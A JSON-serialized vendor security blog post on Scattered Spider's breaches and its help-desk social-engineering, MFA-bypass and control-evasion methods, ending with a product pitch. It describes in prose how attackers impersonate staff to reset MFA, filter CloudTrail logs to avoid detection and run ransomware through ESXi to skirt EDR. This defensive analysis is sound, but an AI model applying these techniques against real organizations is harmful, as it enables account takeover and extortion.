,[],{},{"nodeType":254,"data":101947,"content":101948},{},[101949],{"nodeType":178,"data":101950,"content":101951},{},[101952],{"nodeType":173,"value":93246,"marks":101953,"data":101954},[],{},{"nodeType":254,"data":101956,"content":101957},{},[101958],{"nodeType":178,"data":101959,"content":101960},{},[101961],{"nodeType":173,"value":93256,"marks":101962,"data":101963},[],{},{"nodeType":178,"data":101965,"content":101966},{},[101967],{"nodeType":173,"value":93263,"marks":101968,"data":101969},[],{},{"nodeType":235,"data":101971,"content":101972},{},[101973],{"nodeType":173,"value":93270,"marks":101974,"data":101976},[101975],{"type":370},{},{"nodeType":178,"data":101978,"content":101979},{},[101980],{"nodeType":173,"value":93278,"marks":101981,"data":101982},[],{},{"nodeType":250,"data":101984,"content":101985},{},[101986,101995,102004],{"nodeType":254,"data":101987,"content":101988},{},[101989],{"nodeType":178,"data":101990,"content":101991},{},[101992],{"nodeType":173,"value":93291,"marks":101993,"data":101994},[],{},{"nodeType":254,"data":101996,"content":101997},{},[101998],{"nodeType":178,"data":101999,"content":102000},{},[102001],{"nodeType":173,"value":93301,"marks":102002,"data":102003},[],{},{"nodeType":254,"data":102005,"content":102006},{},[102007],{"nodeType":178,"data":102008,"content":102009},{},[102010],{"nodeType":173,"value":93311,"marks":102011,"data":102012},[],{},{"nodeType":235,"data":102014,"content":102015},{},[102016],{"nodeType":173,"value":93318,"marks":102017,"data":102019},[102018],{"type":370},{},{"nodeType":178,"data":102021,"content":102022},{},[102023],{"nodeType":173,"value":93326,"marks":102024,"data":102025},[],{},{"nodeType":235,"data":102027,"content":102028},{},[102029],{"nodeType":173,"value":93333,"marks":102030,"data":102032},[102031],{"type":370},{},{"nodeType":178,"data":102034,"content":102035},{},[102036],{"nodeType":173,"value":93341,"marks":102037,"data":102038},[],{},{"nodeType":235,"data":102040,"content":102041},{},[102042],{"nodeType":173,"value":93348,"marks":102043,"data":102045},[102044],{"type":370},{},{"nodeType":178,"data":102047,"content":102048},{},[102049],{"nodeType":173,"value":93356,"marks":102050,"data":102051},[],{},{"nodeType":250,"data":102053,"content":102054},{},[102055,102064,102073,102082,102091],{"nodeType":254,"data":102056,"content":102057},{},[102058],{"nodeType":178,"data":102059,"content":102060},{},[102061],{"nodeType":173,"value":93369,"marks":102062,"data":102063},[],{},{"nodeType":254,"data":102065,"content":102066},{},[102067],{"nodeType":178,"data":102068,"content":102069},{},[102070],{"nodeType":173,"value":93379,"marks":102071,"data":102072},[],{},{"nodeType":254,"data":102074,"content":102075},{},[102076],{"nodeType":178,"data":102077,"content":102078},{},[102079],{"nodeType":173,"value":93389,"marks":102080,"data":102081},[],{},{"nodeType":254,"data":102083,"content":102084},{},[102085],{"nodeType":178,"data":102086,"content":102087},{},[102088],{"nodeType":173,"value":93399,"marks":102089,"data":102090},[],{},{"nodeType":254,"data":102092,"content":102093},{},[102094],{"nodeType":178,"data":102095,"content":102096},{},[102097],{"nodeType":173,"value":93409,"marks":102098,"data":102099},[],{},{"nodeType":178,"data":102101,"content":102102},{},[102103],{"nodeType":173,"value":93416,"marks":102104,"data":102105},[],{},{"nodeType":231,"data":102107,"content":102108},{},[],{"nodeType":169,"data":102110,"content":102111},{},[102112],{"nodeType":173,"value":93426,"marks":102113,"data":102115},[102114],{"type":370},{},{"nodeType":178,"data":102117,"content":102118},{},[102119],{"nodeType":173,"value":93434,"marks":102120,"data":102121},[],{},{"nodeType":178,"data":102123,"content":102124},{},[102125,102128,102134],{"nodeType":173,"value":93441,"marks":102126,"data":102127},[],{},{"nodeType":186,"data":102129,"content":102130},{"uri":92943},[102131],{"nodeType":173,"value":93448,"marks":102132,"data":102133},[],{},{"nodeType":173,"value":1477,"marks":102135,"data":102136},[],{},{"nodeType":250,"data":102138,"content":102139},{},[102140,102149,102158],{"nodeType":254,"data":102141,"content":102142},{},[102143],{"nodeType":178,"data":102144,"content":102145},{},[102146],{"nodeType":173,"value":93464,"marks":102147,"data":102148},[],{},{"nodeType":254,"data":102150,"content":102151},{},[102152],{"nodeType":178,"data":102153,"content":102154},{},[102155],{"nodeType":173,"value":93474,"marks":102156,"data":102157},[],{},{"nodeType":254,"data":102159,"content":102160},{},[102161],{"nodeType":178,"data":102162,"content":102163},{},[102164],{"nodeType":173,"value":93484,"marks":102165,"data":102166},[],{},{"nodeType":178,"data":102168,"content":102169},{},[102170,102174,102181],{"nodeType":173,"value":93491,"marks":102171,"data":102173},[102172],{"type":370},{},{"nodeType":186,"data":102175,"content":102176},{"uri":473},[102177],{"nodeType":173,"value":93499,"marks":102178,"data":102180},[102179],{"type":370},{},{"nodeType":173,"value":93504,"marks":102182,"data":102184},[102183],{"type":370},{},{"nodeType":312,"data":102186,"content":102189},{"target":102187},{"sys":102188},{"id":93512,"type":317,"linkType":318},[],{"nodeType":178,"data":102191,"content":102192},{},[102193],{"nodeType":173,"value":37,"marks":102194,"data":102195},[],{},{"items":102197},[102198,102200],{"sys":102199,"name":505},{"id":504},{"sys":102201,"name":509},{"id":508},{"items":102203},[102204],{"fullName":25594,"firstName":25595,"jobTitle":514,"profilePicture":102205},{"url":25597},{"items":102207},[102208],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":102209},{"url":1496},{"json":102211,"links":102921},{"nodeType":165,"data":102212,"content":102213},{},[102214,102219,102283,102290,102297,102300,102306,102313,102361,102368,102371,102378,102406,102495,102511,102516,102519,102526,102533,102539,102545,102552,102630,102637,102680,102688,102691,102698,102705,102712,102719,102726,102732,102735,102742,102762,102769,102792,102799,102802,102808,102814,102820,102825,102842,102847,102853,102860,102866,102869,102875,102894,102910,102915],{"nodeType":312,"data":102215,"content":102218},{"target":102216},{"sys":102217},{"id":100724,"type":317,"linkType":318},[],{"nodeType":178,"data":102220,"content":102221},{},[102222,102226,102233,102236,102243,102246,102253,102256,102262,102265,102271,102274,102280],{"nodeType":173,"value":102223,"marks":102224,"data":102225},"Scattered Spider continues to dominate the headlines, with the latest news linking the hackers to attacks on U.S. insurance giant ",[],{},{"nodeType":186,"data":102227,"content":102228},{"uri":100859},[102229],{"nodeType":173,"value":100862,"marks":102230,"data":102232},[102231],{"type":194},{},{"nodeType":173,"value":2936,"marks":102234,"data":102235},[],{},{"nodeType":186,"data":102237,"content":102238},{"uri":100871},[102239],{"nodeType":173,"value":100874,"marks":102240,"data":102242},[102241],{"type":194},{},{"nodeType":173,"value":2936,"marks":102244,"data":102245},[],{},{"nodeType":186,"data":102247,"content":102248},{"uri":100884},[102249],{"nodeType":173,"value":100887,"marks":102250,"data":102252},[102251],{"type":194},{},{"nodeType":173,"value":100892,"marks":102254,"data":102255},[],{},{"nodeType":186,"data":102257,"content":102258},{"uri":100897},[102259],{"nodeType":173,"value":100900,"marks":102260,"data":102261},[],{},{"nodeType":173,"value":2936,"marks":102263,"data":102264},[],{},{"nodeType":186,"data":102266,"content":102267},{"uri":100908},[102268],{"nodeType":173,"value":100911,"marks":102269,"data":102270},[],{},{"nodeType":173,"value":933,"marks":102272,"data":102273},[],{},{"nodeType":186,"data":102275,"content":102276},{"uri":100908},[102277],{"nodeType":173,"value":100921,"marks":102278,"data":102279},[],{},{"nodeType":173,"value":2340,"marks":102281,"data":102282},[],{},{"nodeType":178,"data":102284,"content":102285},{},[102286],{"nodeType":173,"value":102287,"marks":102288,"data":102289},"This comes at the same time that Google Threat Intelligence Group shared that it “is now aware of multiple intrusions in the U.S. which bear the hallmarks of Scattered Spider activity”, specifically impacting the insurance industry. ",[],{},{"nodeType":178,"data":102291,"content":102292},{},[102293],{"nodeType":173,"value":102294,"marks":102295,"data":102296},"But what exactly does this mean? To answer this, let’s quickly recap how we got here and what a Scattered Spider attack looks like.  ",[],{},{"nodeType":231,"data":102298,"content":102299},{},[],{"nodeType":169,"data":102301,"content":102302},{},[102303],{"nodeType":173,"value":552,"marks":102304,"data":102305},[],{},{"nodeType":178,"data":102307,"content":102308},{},[102309],{"nodeType":173,"value":102310,"marks":102311,"data":102312},"The criminal collective tracked by analysts as Scattered Spider has been active since 2022 and have been linked to a range of high-profile breaches, for example the attacks on Caesars and MGM Resorts in 2023, and Transport for London in 2024. ",[],{},{"nodeType":250,"data":102314,"content":102315},{},[102316,102331,102346],{"nodeType":254,"data":102317,"content":102318},{},[102319],{"nodeType":178,"data":102320,"content":102321},{},[102322,102327],{"nodeType":173,"value":102323,"marks":102324,"data":102326},"Caesars: ",[102325],{"type":370},{},{"nodeType":173,"value":102328,"marks":102329,"data":102330},"hackers impersonated an IT user and convinced an outsourced help desk to reset credentials, after which the attacker stole the customer loyalty program database and secured a $15m ransom payment. ",[],{},{"nodeType":254,"data":102332,"content":102333},{},[102334],{"nodeType":178,"data":102335,"content":102336},{},[102337,102342],{"nodeType":173,"value":102338,"marks":102339,"data":102341},"MGM Resorts: ",[102340],{"type":370},{},{"nodeType":173,"value":102343,"marks":102344,"data":102345},"hackers used LinkedIn information to impersonate an employee and reset the employee’s credentials, resulting in a 6TB data theft. After MGM refused to pay, the attack eventually resulted in a 36-hour outage, a $100m hit, and a class-action lawsuit settled for $45m. ",[],{},{"nodeType":254,"data":102347,"content":102348},{},[102349],{"nodeType":178,"data":102350,"content":102351},{},[102352,102357],{"nodeType":173,"value":102353,"marks":102354,"data":102356},"Transport for London:",[102355],{"type":370},{},{"nodeType":173,"value":102358,"marks":102359,"data":102360}," resulted in 5,000 users’ bank details exposed, 30,000 staff required to attend in-person appointments to verify their identities and reset passwords, and significant disruption to online services lasting for months.",[],{},{"nodeType":178,"data":102362,"content":102363},{},[102364],{"nodeType":173,"value":102365,"marks":102366,"data":102367},"The calling card in these attacks was the abuse of help desk processes to reset passwords and/or MFA factors used to access an account. The attacker simply calls up the help desk with enough information to impersonate an employee, asks them to send an MFA enrollment link for their new mobile device, and can then utilize self-service password reset functionality to take control of the account. Scarily simple. ",[],{},{"nodeType":231,"data":102369,"content":102370},{},[],{"nodeType":169,"data":102372,"content":102373},{},[102374],{"nodeType":173,"value":102375,"marks":102376,"data":102377},"Scattered Spider’s resurgence in 2025",[],{},{"nodeType":178,"data":102379,"content":102380},{},[102381,102385,102392,102395,102402],{"nodeType":173,"value":102382,"marks":102383,"data":102384},"This technique was reprised in a series of high-profile attacks in 2025, with major breaches of UK retailers ",[],{},{"nodeType":186,"data":102386,"content":102387},{"uri":100735},[102388],{"nodeType":173,"value":100738,"marks":102389,"data":102391},[102390],{"type":194},{},{"nodeType":173,"value":933,"marks":102393,"data":102394},[],{},{"nodeType":186,"data":102396,"content":102397},{"uri":100747},[102398],{"nodeType":173,"value":100750,"marks":102399,"data":102401},[102400],{"type":194},{},{"nodeType":173,"value":102403,"marks":102404,"data":102405}," dominating the headlines. Both resulted in the loss of sensitive data and prolonged disruption to in-store and digital services, with M&S feeling the pain of £300m in lost profits and a share value hit approaching £1b, and a multimillion-pound class action lawsuit and possible ICO fines looming.",[],{},{"nodeType":178,"data":102407,"content":102408},{},[102409,102412,102419,102422,102429,102432,102439,102442,102449,102452,102459,102462,102469,102472,102479,102483,102491],{"nodeType":173,"value":100762,"marks":102410,"data":102411},[],{},{"nodeType":186,"data":102413,"content":102414},{"uri":100767},[102415],{"nodeType":173,"value":100770,"marks":102416,"data":102418},[102417],{"type":194},{},{"nodeType":173,"value":2936,"marks":102420,"data":102421},[],{},{"nodeType":186,"data":102423,"content":102424},{"uri":100779},[102425],{"nodeType":173,"value":100782,"marks":102426,"data":102428},[102427],{"type":194},{},{"nodeType":173,"value":2936,"marks":102430,"data":102431},[],{},{"nodeType":186,"data":102433,"content":102434},{"uri":100791},[102435],{"nodeType":173,"value":100794,"marks":102436,"data":102438},[102437],{"type":194},{},{"nodeType":173,"value":2936,"marks":102440,"data":102441},[],{},{"nodeType":186,"data":102443,"content":102444},{"uri":100803},[102445],{"nodeType":173,"value":100806,"marks":102446,"data":102448},[102447],{"type":194},{},{"nodeType":173,"value":2936,"marks":102450,"data":102451},[],{},{"nodeType":186,"data":102453,"content":102454},{"uri":100815},[102455],{"nodeType":173,"value":100818,"marks":102456,"data":102458},[102457],{"type":194},{},{"nodeType":173,"value":2936,"marks":102460,"data":102461},[],{},{"nodeType":186,"data":102463,"content":102464},{"uri":100827},[102465],{"nodeType":173,"value":100830,"marks":102466,"data":102468},[102467],{"type":194},{},{"nodeType":173,"value":9534,"marks":102470,"data":102471},[],{},{"nodeType":186,"data":102473,"content":102474},{"uri":100839},[102475],{"nodeType":173,"value":100842,"marks":102476,"data":102478},[102477],{"type":194},{},{"nodeType":173,"value":102480,"marks":102481,"data":102482}," were among the retailers to suffer a breach between May-June 2025. Unlike the ",[],{},{"nodeType":186,"data":102484,"content":102485},{"uri":819},[102486],{"nodeType":173,"value":102487,"marks":102488,"data":102490},"mass Snowflake breaches in 2024",[102489],{"type":194},{},{"nodeType":173,"value":102492,"marks":102493,"data":102494}," (which targeted a single platform used by many organizations), these attacks are notable in that they are seemingly unrelated — they simply represent a concerted effort by attackers to target the retail sector. ",[],{},{"nodeType":178,"data":102496,"content":102497},{},[102498,102502,102507],{"nodeType":173,"value":102499,"marks":102500,"data":102501},"Less details have been provided about these attacks compared to the M&S and Co-op breaches, but a number of them specifically point to the use of ",[],{},{"nodeType":173,"value":102503,"marks":102504,"data":102506},"identity-based techniques",[102505],{"type":370},{},{"nodeType":173,"value":102508,"marks":102509,"data":102510}," as opposed to more traditional software exploits — another hallmark of Scattered Spider. This leads us to our first key takeaway…",[],{},{"nodeType":312,"data":102512,"content":102515},{"target":102513},{"sys":102514},{"id":88007,"type":317,"linkType":318},[],{"nodeType":231,"data":102517,"content":102518},{},[],{"nodeType":169,"data":102520,"content":102521},{},[102522],{"nodeType":173,"value":102523,"marks":102524,"data":102525},"Takeaway #1: Identity-based TTPs are the new normal",[],{},{"nodeType":178,"data":102527,"content":102528},{},[102529],{"nodeType":173,"value":102530,"marks":102531,"data":102532},"Scattered Spider’s attacks are the latest in a growing number of identity-based breaches. When we look back at Scattered Spider’s TTP evolution, we can see that they have consistently exploited identity-based weaknesses in order to gain access to victim environments. ",[],{},{"nodeType":312,"data":102534,"content":102538},{"target":102535},{"sys":102536},{"id":102537,"type":317,"linkType":318},"2vs8WgO4gfGLxscjGMBSY6",[],{"nodeType":178,"data":102540,"content":102541},{},[102542],{"nodeType":173,"value":101096,"marks":102543,"data":102544},[],{},{"nodeType":178,"data":102546,"content":102547},{},[102548],{"nodeType":173,"value":102549,"marks":102550,"data":102551},"Scattered Spider has heavily relied on identity-based TTPs since they first emerged in 2022, following a repeatable path of bypassing MFA, achieving account takeover on privileged accounts, stealing data from cloud services, and deploying ransomware (principally in VMware environments). TTPs used by Scattered Spider include:",[],{},{"nodeType":250,"data":102553,"content":102554},{},[102555,102564,102573,102592,102601,102610],{"nodeType":254,"data":102556,"content":102557},{},[102558],{"nodeType":178,"data":102559,"content":102560},{},[102561],{"nodeType":173,"value":101127,"marks":102562,"data":102563},[],{},{"nodeType":254,"data":102565,"content":102566},{},[102567],{"nodeType":178,"data":102568,"content":102569},{},[102570],{"nodeType":173,"value":101137,"marks":102571,"data":102572},[],{},{"nodeType":254,"data":102574,"content":102575},{},[102576],{"nodeType":178,"data":102577,"content":102578},{},[102579,102582,102589],{"nodeType":173,"value":59119,"marks":102580,"data":102581},[],{},{"nodeType":186,"data":102583,"content":102584},{"uri":775},[102585],{"nodeType":173,"value":778,"marks":102586,"data":102588},[102587],{"type":194},{},{"nodeType":173,"value":101157,"marks":102590,"data":102591},[],{},{"nodeType":254,"data":102593,"content":102594},{},[102595],{"nodeType":178,"data":102596,"content":102597},{},[102598],{"nodeType":173,"value":101167,"marks":102599,"data":102600},[],{},{"nodeType":254,"data":102602,"content":102603},{},[102604],{"nodeType":178,"data":102605,"content":102606},{},[102607],{"nodeType":173,"value":101177,"marks":102608,"data":102609},[],{},{"nodeType":254,"data":102611,"content":102612},{},[102613],{"nodeType":178,"data":102614,"content":102615},{},[102616,102619,102626],{"nodeType":173,"value":101187,"marks":102617,"data":102618},[],{},{"nodeType":186,"data":102620,"content":102621},{"uri":49844},[102622],{"nodeType":173,"value":101194,"marks":102623,"data":102625},[102624],{"type":194},{},{"nodeType":173,"value":102627,"marks":102628,"data":102629}," to steal live user sessions",[],{},{"nodeType":178,"data":102631,"content":102632},{},[102633],{"nodeType":173,"value":102634,"marks":102635,"data":102636},"So, help desk scams are an important part of their toolkit, but it’s not the whole picture. Methods like AiTM phishing in particular have spiked in popularity this year as a reliable and scalable way of bypassing MFA and achieving account takeover.",[],{},{"nodeType":178,"data":102638,"content":102639},{},[102640,102644,102653,102656,102664,102668,102677],{"nodeType":173,"value":102641,"marks":102642,"data":102643},"It’s important not to think about these techniques as just a Scattered Spider trait either. After all, Scattered Spider is not a self-identified group — it’s a name given by analysts to patterns of activity. Given the series of arrests in 2024, it’s unlikely that the current incarnation of Scattered Spider is the same individuals behind the attacks in 2022-2024. And these identity-based attack patterns are shared across various self-named criminal groups like, ",[],{},{"nodeType":186,"data":102645,"content":102647},{"uri":102646},"https://www.cisa.gov/sites/default/files/2023-08/CSRB_Lapsus%24_508c.pdf",[102648],{"nodeType":173,"value":102649,"marks":102650,"data":102652},"Lapsus$, Yanluowang, Karakurt",[102651],{"type":194},{},{"nodeType":173,"value":9534,"marks":102654,"data":102655},[],{},{"nodeType":186,"data":102657,"content":102658},{"uri":819},[102659],{"nodeType":173,"value":102660,"marks":102661,"data":102663},"ShinyHunters",[102662],{"type":194},{},{"nodeType":173,"value":102665,"marks":102666,"data":102667},". Even Russian state-sponsored actors are ",[],{},{"nodeType":186,"data":102669,"content":102671},{"uri":102670},"https://www.microsoft.com/en-us/security/blog/2025/05/27/new-russia-affiliated-actor-void-blizzard-targets-critical-sectors-for-espionage/",[102672],{"nodeType":173,"value":102673,"marks":102674,"data":102676},"increasingly using the kinds of techniques popularised by criminal groups",[102675],{"type":194},{},{"nodeType":173,"value":1477,"marks":102678,"data":102679},[],{},{"nodeType":178,"data":102681,"content":102682},{},[102683],{"nodeType":173,"value":102684,"marks":102685,"data":102687},"Simply, identity-based techniques are the new normal for attackers in 2025. ",[102686],{"type":370},{},{"nodeType":231,"data":102689,"content":102690},{},[],{"nodeType":169,"data":102692,"content":102693},{},[102694],{"nodeType":173,"value":102695,"marks":102696,"data":102697},"Takeaway #2: Help desk scams aren't new, but they're here to stay",[],{},{"nodeType":178,"data":102699,"content":102700},{},[102701],{"nodeType":173,"value":102702,"marks":102703,"data":102704},"As we established earlier, help desk scams are nothing new (we saw them in the Caesars, MGM Resorts, and Transport for London breaches to name a few). But they’re likely to become increasingly prevalent as Scattered Spider continues to demonstrate just how effective help desk scams are. ",[],{},{"nodeType":178,"data":102706,"content":102707},{},[102708],{"nodeType":173,"value":102709,"marks":102710,"data":102711},"One of the reasons they’re so effective is that most help desks have the same process for every account — it doesn’t matter who you’re impersonating or which account you’re trying to reset. So, attackers are specifically targeting accounts likely to have top tier admin privileges — meaning once they get in, progressing the attack is trivial and much of the typical privilege escalation and lateral movement is removed from the attack path. ",[],{},{"nodeType":178,"data":102713,"content":102714},{},[102715],{"nodeType":173,"value":102716,"marks":102717,"data":102718},"Help desks are a target for a reason. They’re “helpful” by nature. This is usually reflected in how they’re operated and performance measured — delays won’t help you to hit those SLAs! Ultimately, a process only works if employees are willing to adhere to it — and can’t be socially engineered to break it. Help desks that are removed from day-to-day operations (especially when outsourced or offshored) are also inherently susceptible to attacks where employees are impersonated. ",[],{},{"nodeType":178,"data":102720,"content":102721},{},[102722],{"nodeType":173,"value":102723,"marks":102724,"data":102725},"But, the attacks that organizations are experiencing at the moment should give security stakeholders plenty of ammunition as to why help desk reforms are vital to securing the business (and what can happen if you don’t make changes). ",[],{},{"nodeType":312,"data":102727,"content":102731},{"target":102728},{"sys":102729},{"id":102730,"type":317,"linkType":318},"5Z3J9QuPKesWShV4OGMrYt",[],{"nodeType":231,"data":102733,"content":102734},{},[],{"nodeType":169,"data":102736,"content":102737},{},[102738],{"nodeType":173,"value":102739,"marks":102740,"data":102741},"Takeaway #3: Scattered Spider are consciously evading established security controls",[],{},{"nodeType":178,"data":102743,"content":102744},{},[102745,102749,102754,102757],{"nodeType":173,"value":102746,"marks":102747,"data":102748},"So, there’s more to Scattered Spider’s toolkit than just help desk scams. In fact, their approach can be broadly classified as",[],{},{"nodeType":173,"value":102750,"marks":102751,"data":102753}," consciously evading established controls",[102752],{"type":370},{},{"nodeType":173,"value":3107,"marks":102755,"data":102756},[],{},{"nodeType":173,"value":102758,"marks":102759,"data":102761},"at the endpoint and network layer by targeting identities. ",[102760],{"type":370},{},{"nodeType":178,"data":102763,"content":102764},{},[102765],{"nodeType":173,"value":102766,"marks":102767,"data":102768},"From the point of account takeover, they also follow repeatable patterns:",[],{},{"nodeType":250,"data":102770,"content":102771},{},[102772,102782],{"nodeType":254,"data":102773,"content":102774},{},[102775],{"nodeType":178,"data":102776,"content":102777},{},[102778],{"nodeType":173,"value":102779,"marks":102780,"data":102781},"Harvesting and exfiltrating data from cloud and SaaS services, where monitoring is typically less consistent than traditional on-premise environments, and exfiltration often blends in with normal activity. Many organizations simply don’t have the logs or visibility to detect malicious activity in the cloud anyway, and Scattered Spider have also been seen tampering with cloud logs (e.g. filtering risky AWS CloudTrail logs, but not disabling it entirely so as not to raise suspicion).",[],{},{"nodeType":254,"data":102783,"content":102784},{},[102785],{"nodeType":178,"data":102786,"content":102787},{},[102788],{"nodeType":173,"value":102789,"marks":102790,"data":102791},"Targeting VMware environments for ransomware deployment. They do this by adding their compromised user account to the VMware admins group in VCentre (if needed — they are going after accounts with top tier privileges by default). From here, they can access the VMware environment via the ESXi hypervisor layer, where security software is nonexistent — thereby bypassing EDR and other typical endpoint and host based controls you rely on to prevent ransomware execution. ",[],{},{"nodeType":178,"data":102793,"content":102794},{},[102795],{"nodeType":173,"value":102796,"marks":102797,"data":102798},"The key theme? Getting around your established security controls. ",[],{},{"nodeType":231,"data":102800,"content":102801},{},[],{"nodeType":169,"data":102803,"content":102804},{},[102805],{"nodeType":173,"value":101221,"marks":102806,"data":102807},[],{},{"nodeType":178,"data":102809,"content":102810},{},[102811],{"nodeType":173,"value":101228,"marks":102812,"data":102813},[],{},{"nodeType":178,"data":102815,"content":102816},{},[102817],{"nodeType":173,"value":101235,"marks":102818,"data":102819},[],{},{"nodeType":312,"data":102821,"content":102824},{"target":102822},{"sys":102823},{"id":101242,"type":317,"linkType":318},[],{"nodeType":178,"data":102826,"content":102827},{},[102828,102832,102839],{"nodeType":173,"value":102829,"marks":102830,"data":102831},"To help combat help desk scams, Push recently released ",[],{},{"nodeType":186,"data":102833,"content":102834},{"uri":9152},[102835],{"nodeType":173,"value":101255,"marks":102836,"data":102838},[102837],{"type":370},{},{"nodeType":173,"value":101261,"marks":102840,"data":102841},[],{},{"nodeType":312,"data":102843,"content":102846},{"target":102844},{"sys":102845},{"id":9179,"type":317,"linkType":318},[],{"nodeType":178,"data":102848,"content":102849},{},[102850],{"nodeType":173,"value":101273,"marks":102851,"data":102852},[],{},{"nodeType":178,"data":102854,"content":102855},{},[102856],{"nodeType":173,"value":102857,"marks":102858,"data":102859},"Eric Rubin — a Senior Manager in GitLab’s Corporate Security team — has already rolled out Employee Identity Verification Codes across his workforce. Here’s what he had to say:",[],{},{"nodeType":312,"data":102861,"content":102865},{"target":102862},{"sys":102863},{"id":102864,"type":317,"linkType":318},"jHH13doHHHaqUUxHoBeKW",[],{"nodeType":231,"data":102867,"content":102868},{},[],{"nodeType":169,"data":102870,"content":102871},{},[102872],{"nodeType":173,"value":88147,"marks":102873,"data":102874},[],{},{"nodeType":178,"data":102876,"content":102877},{},[102878,102881,102890],{"nodeType":173,"value":101289,"marks":102879,"data":102880},[],{},{"nodeType":186,"data":102882,"content":102884},{"uri":102883},"https://pushsecurity.com/free-tool/employee-verification-codes?utm_campaign=15408561-FY25Q2-Employee-verification-codes&utm_source=Sponsored-content&utm_content=bleepingcomputer",[102885],{"nodeType":173,"value":102886,"marks":102887,"data":102889},"sign up for a trial account and you can deploy the extension organization-wide to make use of this feature.",[102888],{"type":194},{},{"nodeType":173,"value":102891,"marks":102892,"data":102893}," While you’re at it, you can trial Push’s full features for up to 10 users for free. ",[],{},{"nodeType":178,"data":102895,"content":102896},{},[102897,102900,102907],{"nodeType":173,"value":101309,"marks":102898,"data":102899},[],{},{"nodeType":186,"data":102901,"content":102902},{"uri":100654},[102903],{"nodeType":173,"value":1472,"marks":102904,"data":102906},[102905],{"type":194},{},{"nodeType":173,"value":1477,"marks":102908,"data":102909},[],{},{"nodeType":312,"data":102911,"content":102914},{"target":102912},{"sys":102913},{"id":101326,"type":317,"linkType":318},[],{"nodeType":178,"data":102916,"content":102917},{},[102918],{"nodeType":173,"value":37,"marks":102919,"data":102920},[],{},{"entries":102922},{"hyperlink":102923,"inline":102924,"block":102925},[],[],[102926,102962,102967,102973,102997,103002,103005,103011],{"sys":102927,"__typename":5311,"content":102928,"name":102961,"title":118},{"id":100724},{"json":102929},{"nodeType":165,"data":102930,"content":102931},{},[102932],{"nodeType":178,"data":102933,"content":102934},{},[102935,102939,102946,102950,102957],{"nodeType":173,"value":102936,"marks":102937,"data":102938},"It's been a busy year for cyber criminals! This article has now been superseded with the rise to infamy of ",[],{},{"nodeType":186,"data":102940,"content":102941},{"uri":39735},[102942],{"nodeType":173,"value":102943,"marks":102944,"data":102945},"\"Scattered Lapsus$ Hunters\"",[],{},{"nodeType":173,"value":102947,"marks":102948,"data":102949},". The guidance and TTPs in this blog post still apply, but ",[],{},{"nodeType":186,"data":102951,"content":102952},{"uri":39735},[102953],{"nodeType":173,"value":102954,"marks":102955,"data":102956},"check out our new post",[],{},{"nodeType":173,"value":102958,"marks":102959,"data":102960}," for the full picture of Scattered Spider-linked breaches dating back to 2021. ",[],{},"SS insight box 1",{"sys":102963,"__typename":15269,"type":15270,"ctaText":102964,"buttonLabel":102965,"buttonColour":15273,"buttonUrl":102966},{"id":88007},"Learn about Scattered Spider's latest TTPs in our on-demand webinar","Watch on-demand","https://pushsecurity.com/webinar/scatteredspider",{"sys":102968,"__typename":5345,"title":102969,"caption":102969,"layoutMode":118,"file":102970},{"id":102537},"Scattered Spider initial access vectors in public breaches where the attack vector was disclosed.",{"url":102971,"width":5358,"height":102972},"https://images.ctfassets.net/y1cdw1ablpvd/7hJowGlrqAWDpGIag1xWX5/0ce85d41e117129c3db25ea4a09a5604/image3.png",1136,{"sys":102974,"__typename":5311,"content":102975,"name":102996,"title":118},{"id":102730},{"json":102976},{"nodeType":165,"data":102977,"content":102978},{},[102979],{"nodeType":178,"data":102980,"content":102981},{},[102982,102985,102992],{"nodeType":173,"value":37,"marks":102983,"data":102984},[],{},{"nodeType":186,"data":102986,"content":102987},{"uri":1034},[102988],{"nodeType":173,"value":102989,"marks":102990,"data":102991},"Check out our recent blog post",[],{},{"nodeType":173,"value":102993,"marks":102994,"data":102995}," to learn more about help desk scams and how to protect your organization. ",[],{},"Scattered Spider Insurance Blog Insight Box 1",{"sys":102998,"__typename":5345,"title":102999,"caption":102999,"layoutMode":118,"file":103000},{"id":101242},"Push Security contributes to a layered defense against known Scattered Spider TTPs.",{"url":103001,"width":5358,"height":102972},"https://images.ctfassets.net/y1cdw1ablpvd/1l3phtTjFoQDleiOKYfrXn/ead73aef01e72f08885656d79521a27a/image3.png",{"sys":103003,"__typename":5345,"title":32278,"caption":32279,"layoutMode":118,"file":103004},{"id":9179},{"url":32281,"width":32282,"height":32283},{"sys":103006,"__typename":5345,"title":103007,"caption":118,"layoutMode":118,"file":103008},{"id":102864},"GitLab Quote",{"url":103009,"width":103010,"height":91424},"https://images.ctfassets.net/y1cdw1ablpvd/72pQc6jrPIdG2IMgv45Rf8/4ca5d7c9586d16fdfc0596813156c9b8/GitLab_Quote.png",2000,{"sys":103012,"__typename":15269,"type":15270,"ctaText":103013,"buttonLabel":103014,"buttonColour":15273,"buttonUrl":101294},{"id":101326},"Deploy Employee Verification Codes for free today and protect your help desk from Scattered Spider","Try it free","content:blog:key-takeaways-from-the-scattered-spider-attacks-on-insurance-firms.json","blog/key-takeaways-from-the-scattered-spider-attacks-on-insurance-firms.json","blog/key-takeaways-from-the-scattered-spider-attacks-on-insurance-firms",{"_path":103019,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":103020,"summary":103022,"title":101334,"subtitle":118,"metaTitle":103033,"synopsis":101335,"hashTags":118,"publishedDate":101336,"slug":101337,"ogImage":103034,"tagsCollection":103035,"relatedBlogPostsCollection":103041,"authorsCollection":105224,"content":105228,"_id":105808,"_type":5439,"_source":5440,"_file":105809,"_stem":105810,"_extension":5439},"/blog/scattered-spider-defending-against-help-desk-scams",{"id":100715,"publishedAt":103021},"2025-11-13T19:48:32.622Z",{"json":103023},{"data":103024,"content":103025,"nodeType":165},{},[103026],{"data":103027,"content":103028,"nodeType":178},{},[103029],{"data":103030,"marks":103031,"value":103032,"nodeType":173},{},[],"Scattered Spider has dominated the headlines in recent months and has gained significant attention for its use of help desk scams. Here's how they work and what you can do to protect your organization. ","How to protect your organization from help desk 